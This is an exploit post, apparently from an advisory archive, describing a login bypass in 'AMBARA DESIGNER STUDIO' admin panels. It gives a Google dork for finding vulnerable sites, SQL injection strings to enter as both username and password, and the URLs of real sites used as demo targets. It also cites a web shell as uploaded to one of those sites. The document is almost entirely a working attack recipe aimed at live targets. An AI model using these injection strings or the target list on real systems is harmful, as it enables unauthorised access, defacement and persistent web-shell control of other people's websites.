AMBARA DESIGNER STUDIO Admin Login Bypass upload sh3ll

Published
Credit
Risk
2017.07.10
iranonymous
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: intext:" AMBARA DESIGNER STUDIO "

======================================================
# Exploit Title: AMBARA DESIGNER STUDIO Admin Login Bypass upload sh3ll
# Google Dork: intext:" AMBARA DESIGNER STUDIO "
# Date: 2017-07-09
# Author: iranonymous
# Tested on: Win 7, Linux
***************************************************
# Then Choose a Target and put this after URL :--> /admin/
# And fill username and password like the information below :
# Username: '=' 'or'
# Password: '=' 'or'
======================================================
# Demo :

http://ambarastudio.in/admin/
http://ambarastudio.com/admin/

# Proof upload:

http://ambarastudio.in/admin/uploads/Sh3ll.php

=====================================================
# Thanks to : ~~> MR.Khatar || Blackwolf_Iran ||Ormazd || ll_azab-siyah_ll || Dedicated Content ||Sh@d0w ||Hellish_PN (mamad khodesh) ||Shdmehr ||Rabinson || Danger BoY

# Iranian Anonymous

# Discovered By: Saman.Khan

References:

iranonymous


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com